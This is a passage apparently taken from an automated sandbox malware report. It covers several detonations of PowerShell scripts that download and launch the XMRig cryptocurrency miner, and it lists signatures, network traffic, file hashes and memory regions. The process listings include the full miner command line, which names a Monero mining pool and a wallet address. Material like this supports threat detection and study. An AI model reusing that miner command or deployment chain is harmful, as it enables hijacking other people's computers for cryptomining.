| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4540-25-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-48-0x000001AA79EC0000-0x000001AA79ED2000-memory.dmp
memory/4540-61-0x000001AA797E0000-0x000001AA797EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3500-90-0x00000204216F0000-0x0000020421710000-memory.dmp
memory/3500-91-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/4540-92-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/4540-94-0x00007FFCC3B93000-0x00007FFCC3B94000-memory.dmp
memory/3500-93-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/4540-95-0x00007FFCC3B90000-0x00007FFCC457C000-memory.dmp
memory/3500-96-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-97-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-98-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-99-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-100-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-101-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-102-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-103-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-104-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-105-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-106-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-107-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-108-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-109-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-110-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-111-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-112-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-113-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-114-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-115-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-116-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-117-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-118-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-119-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-120-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-121-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-122-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-123-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-124-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-125-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-126-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-127-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-128-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-129-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-130-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-131-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-132-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-133-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-134-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-135-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-136-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-137-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-138-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-139-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-140-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-141-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-142-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-143-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-144-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-145-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-146-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-147-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-148-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-149-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-150-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-151-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-152-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-153-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-154-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-155-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
memory/3500-156-0x00007FF65E7C0000-0x00007FF65F3F3000-memory.dmp
Analysis: behavioral9
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win7-20240221-en
Max time kernel
1558s
Max time network
1559s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
Network
Files
memory/2992-4-0x000007FEF60DE000-0x000007FEF60DF000-memory.dmp
memory/2992-5-0x000000001B6A0000-0x000000001B982000-memory.dmp
memory/2992-7-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2992-6-0x00000000028F0000-0x00000000028F8000-memory.dmp
memory/2992-8-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2992-9-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2992-10-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2992-11-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
memory/2992-12-0x000007FEF5E20000-0x000007FEF67BD000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4740 wrote to memory of 1996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4740 wrote to memory of 1996 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.73.42.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4740-2-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp
memory/4740-5-0x000002B4B4600000-0x000002B4B4622000-memory.dmp
memory/4740-8-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
memory/4740-9-0x000002B4B48C0000-0x000002B4B4936000-memory.dmp
memory/4740-10-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4fyvzlca.sli.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4740-25-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
memory/4740-48-0x000002B4B48A0000-0x000002B4B48B2000-memory.dmp
memory/4740-61-0x000002B4B4860000-0x000002B4B486A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1996-90-0x000001C18D4F0000-0x000001C18D510000-memory.dmp
memory/1996-91-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-92-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/4740-93-0x00007FFAB0573000-0x00007FFAB0574000-memory.dmp
memory/4740-94-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
memory/4740-95-0x00007FFAB0570000-0x00007FFAB0F5C000-memory.dmp
memory/1996-96-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-97-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-98-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-99-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-100-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-101-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-102-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-103-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-104-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-105-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-106-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-107-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-108-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-109-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-110-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-111-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-112-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-113-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-114-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-115-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-116-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-117-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-118-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-119-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-120-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-121-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-122-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-123-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-124-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-125-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-126-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-127-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-128-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-129-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-130-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-131-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-132-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-133-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-134-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-135-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-136-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-137-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-138-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-139-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-140-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-141-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-142-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-143-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-144-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-145-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-146-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-147-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-148-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-149-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-150-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-151-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-152-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-153-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-154-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-155-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
memory/1996-156-0x00007FF70C140000-0x00007FF70CD73000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:01
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2696 wrote to memory of 3624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2696 wrote to memory of 3624 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4244,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=3900 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1404,i,13035806169561352434,1332896185314862791,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/2696-0-0x00007FFCA8693000-0x00007FFCA8695000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ayljf3ja.bhz.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2696-10-0x0000018A78E80000-0x0000018A78EA2000-memory.dmp
memory/2696-11-0x00007FFCA8690000-0x00007FFCA9151000-memory.dmp
memory/2696-12-0x00007FFCA8690000-0x00007FFCA9151000-memory.dmp
memory/2696-14-0x00007FFCA8690000-0x00007FFCA9151000-memory.dmp
memory/2696-16-0x0000018A79030000-0x0000018A7903A000-memory.dmp
memory/2696-15-0x0000018A79270000-0x0000018A79282000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
